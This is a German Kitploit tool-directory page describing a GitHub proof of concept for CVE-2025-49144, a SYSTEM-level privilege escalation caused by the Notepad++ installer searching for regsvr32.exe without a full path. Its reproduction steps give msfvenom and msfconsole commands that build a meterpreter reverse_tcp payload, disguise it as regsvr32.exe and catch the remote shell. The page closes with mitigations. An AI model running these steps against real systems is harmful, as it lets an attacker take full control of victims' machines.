Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
notepad-v8.8.1-LPE-CVE- — CVE-2025-49144 * Notepad++ v8.8.1 * SYSTEM-Ebene POC | Kitploit
Tools/GitHubGitHub/assad12341/notepad-v8.8.1-lpe-cve-
Privilege EscalationSchwachstellenanalyseExploitationLernen & BildungPayload-EntwicklungBinary-ExploitationLabs & Praxis
GitHubassad12341/notepad-v8.8.1-lpe-cve-

notepad-v8.8.1-LPE-CVE-

CVE-2025-49144 * Notepad++ v8.8.1 * SYSTEM-Ebene POC

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

notepad-v8.8.1-LPE-CVE-

CVE-2025-49144 * Notepad++ v8.8.1 * SYSTEM-level POC

image

📌 CVE-2025-49144 ist eine hochriskante lokale Privilegieneskalation-Schwachstelle, die in den Installationsprogrammen von Notepad++ v8.8.1 und früheren Versionen gefunden wurde. Diese Schwachstelle resultiert aus einem unkontrollierten Verhalten des ausführbaren Suchpfads während der Installation, was einem lokalen Angreifer ermöglicht, SYSTEM-Ebene-Privilegien zu erlangen, indem er schädliche ausführbare Dateien im selben Verzeichnis wie das Installationsprogramm platziert.

⚙️ Wie der CVE funktioniert – Schritt für Schritt:

🧱 1. Was ist im Installationsprogramm schiefgelaufen?

Das Notepad++-Installationsprogramm (vor v8.8.2) ruft regsvr32.exe auf, um einige Komponenten zu registrieren – tut dies jedoch ohne Angabe des vollständigen Pfads (wie C:\Windows\System32\regsvr32.exe).

Stattdessen führt es einfach aus:

regsvr32.exe some_dll

📂 2. Windows-Suchpfadverhalten: Wenn eine ausführbare Datei ohne vollständigen Pfad gestartet wird, verwendet Windows eine bestimmte Suchreihenfolge, um die Datei zu finden:

  • Der Ordner, aus dem die Anwendung gestartet wurde (z. B. Downloads)
  • Der Systemordner (System32)
  • Der Windows-Ordner
  • Aktuelles Arbeitsverzeichnis
  • Pfade in der PATH-Umgebungsvariable

Wenn also eine gefälschte regsvr32.exe im selben Ordner wie das Installationsprogramm (z. B. Downloads) platziert wird, verwendet Windows diese vor der echten.

💣 3. Ausnutzung:

  • Angreifer platziert eine schädliche regsvr32.exe im selben Ordner wie das legitime Notepad++-Installationsprogramm (z. B. im Downloads-Ordner des Opfers).
  • Opfer führt das Installationsprogramm aus (denkt, es sei sicher).
  • Das Installationsprogramm ruft regsvr32.exe auf, führt aber letztendlich die schädliche aus demselben Ordner aus – mit SYSTEM-Privilegien (da Installationsprogramme normalerweise Administratorrechte anfordern).
  • Die Nutzlast des Angreifers läuft nun als NT AUTHORITY\SYSTEM.

⚙️ Schritte zur Reproduktion:

Shellcode abrufen: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f c > shellcode.txt

Laden Sie die Datei "regsvr32_loader.c" herunter und bearbeiten Sie sie. Fügen Sie den gesamten Shellcode aus shellcode.txt in den genannten Kommentar ein.

Kompilieren zu regsvr32.exe: x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows

Einen Meterpreter-Listener bereitstellen: msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.9 set LPORT 4444 run

Laden Sie eine anfällige Version von Notepad++ herunter, d.h. vor 8.8.1, da 8.8.1 jetzt automatisch aktualisiert wird. Für den PoC habe ich Notepad++ v8.6.8 verwendet. Verschieben Sie die Datei "regsvr32.exe" in das Windows-System in denselben Ordner wie das Notepad++-Installationsprogramm, wahrscheinlich in den Downloads-Ordner. Schließen Sie die Installation des Notepad++-Installationsprogramms ab.

Hinweis: Dies ist ein PoC, daher getestet mit deaktiviertem Windows Defender und Echtzeitschutz.

✅ Minderung

Benutzer und Administratoren sollten:

  • Upgrade auf Notepad++ v8.8.2 oder später durchführen
  • Softwareinstallation auf vertrauenswürdige Administratoren beschränken
  • Verwenden Sie AppLocker, WDAC oder Softwareeinschränkungsrichtlinien (SRP), um:
    • Ausführung aus benutzerbeschreibbaren Ordnern (z. B. Downloads) blockieren
    • Ausführung nicht vertrauenswürdiger Binärdateien wie regsvr32.exe aus nicht autorisierten Pfaden verhindern
    • Codesignierung für ausführbare Dateien erzwingen

Sicherheitsteams sollten regelmäßig Installationspfade prüfen, Schreibberechtigungen überwachen und das Verhalten während der Installationsausführung beobachten, um die Angriffsfläche zu verringern.

🏷️ Lizenz MIT-Lizenz — Nur für Bildungs-, Forschungs- und Verteidigungszwecke kostenlos.

🤝 Mitwirken Pull-Requests willkommen — Verbesserung der Erkennung, Hinzufügen von Funktionen oder Vorschlagen von Fehlerbehebungen.

Tool herunterladen